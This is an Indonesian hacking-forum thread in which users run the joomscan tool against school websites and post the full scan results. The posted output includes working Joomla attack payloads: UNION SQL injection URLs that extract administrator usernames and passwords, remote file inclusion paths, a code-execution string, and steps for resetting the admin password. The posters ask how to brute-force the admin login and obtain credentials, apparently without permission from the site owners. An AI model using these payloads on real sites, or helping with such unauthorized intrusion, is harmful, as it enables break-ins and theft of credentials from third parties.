Coba joomscan.pl
#1
Question 
Hmmm gak ada kerjaan siang - siang...
coba pentest situs sekolah saya....
hmmm kalo salah, dihapus saja tritnya...
abis bingung mau post dimana....
Yang mau saya tanyakan,
"Hasilnya selalu : N/A"
apakah itu berarti website itu aman?
lalu, pencarian halaman admin. telah dirubah directorynya... bagaimana cara bruteforcenya? menggunakan apa?
Ini hasilnya......
Spoiler! :

Vulnerability Entries: 466
Last update: August 18, 2009

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: sanurbsd-***.sch.id

Server: Apache/2.2.14 (Ubuntu)


## NOTE: The Administrator URL was renamed. Bruteforce it. ##
## None of /administrator, /admin, /manage ##


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] .htaccess shipped with Joomla! is being deployed for SEO purpose
[!] It contains some defensive mod_rewrite rules
[!] Payloads that contain strings (mosConfig,base64_encode,<script>
GLOBALS,_REQUEST) wil be responsed with 403.


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? N/A

# 2
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 3
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 4
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 6
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 7
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

There is a vulnerable point in 7 found entries!

~[*] Time Taken: 11 sec
~[*] Send bugs, suggestions, contributions to [email protected]

Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#2
berarti sudah di patch terus.. sekarang perhatikan kata2 pada opening tools tersebut

Use svn co to update the scanner
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan

nah udah di update ? .. coz bisa saja situs target memakai joomla terbaru yang belum memiliki vulrn pada tools jommla scanner tersebut Smile
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
ehehehhe belum om Smile
nanti pas pake backtrack, di update deh...
lagi pake wedus nih
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#4
UPDATED.....

Pas di ./joomscan.pl update

Error...

terus, ke https://joomscan.svn.sourceforge.net/svn...can/trunk/
Websitenya joomscan...

https://joomscan.svn.sourceforge.net/svn...b-info.txt <-- release date...

masih sama kayak yang di install di BT saya...
gimana tuh?

ada cara lain gak buat scan joomla?
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#5
klo ane sih udah gk maen2 gituan .. coba cari aja di situs-situs exploit seperti dis9.com .. terus secara manual aja lach Tongue
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#6
(06-19-2011, 02:22 AM)zee eichel Wrote: klo ane sih udah gk maen2 gituan .. coba cari aja di situs-situs exploit seperti dis9.com .. terus secara manual aja lach Tongue

jiah promosi...
hahahha
tapi ane pengen belajar yang pake tools2 backtrack om...
pengen belajar metasploit... tapi kyknya rumit.. ahahhaha
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#7
mau nanya juga nih
saya juga coba scan situs sekolah nah nemu kaya gini
Spoiler! :
Server: nginx admin
X-Powered-By: PHP/5.2.17


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Generic version family ....... [1.5.x]

~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTI...ROTECT.pdf
Vulnerable? Yes

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 18
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 19
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No

# 20
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 21
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 22
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 32
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 33
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 34
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 35
Info -> Component: EasyBook SQL Injection Vulnerability
Version Affected: 1.1<=
Check: /components/com_easybook/
Exploit: /index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 36
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions effected: 1.0.1 Beta <=
Check: /components/com_k2/
Exploit: /index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 37
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 38
Info -> Component: Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability
Versions Affected: v2.7.3
Check: /index.php?option=com_phocagallery&view=categories&Itemid=
Exploit: /index.php?option=com_phocagallery&view=categories&Itemid=
Vulnerable? No

# 39
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

There are 5 vulnerable points in 39 found entries!

~[*] Time Taken: 36 min and 56 sec
~[*] Send bugs, suggestions, contributions to [email protected]
root@bt:/pentest/web/scanners/joomscan#


di atas ada vuln pada /administrator
langkah selanjutnya apa ya?
bingung nih mau ngapain lagi
<< back|track'ers newbee

#8
(06-19-2011, 04:06 AM)THJC Wrote:
(06-19-2011, 02:22 AM)zee eichel Wrote: klo ane sih udah gk maen2 gituan .. coba cari aja di situs-situs exploit seperti dis9.com .. terus secara manual aja lach Tongue

jiah promosi...
hahahha
tapi ane pengen belajar yang pake tools2 backtrack om...
pengen belajar metasploit... tapi kyknya rumit.. ahahhaha

yahhh in mah lanjutan diskusi saya dah
hiks hiks
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#9
(03-16-2012, 02:05 AM)wine trochanter Wrote: yahhh in mah lanjutan diskusi saya dah
hiks hiks
tanya doong ane
itu kalo vulnya di /administrator/ kita gunain apa ya buat dapetin pass ama username nya??
<< back|track'ers newbee

#10
waduh, vuln di /administrator/ ? apaan tuh vulnnya?
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog






Users browsing this thread: 1 Guest(s)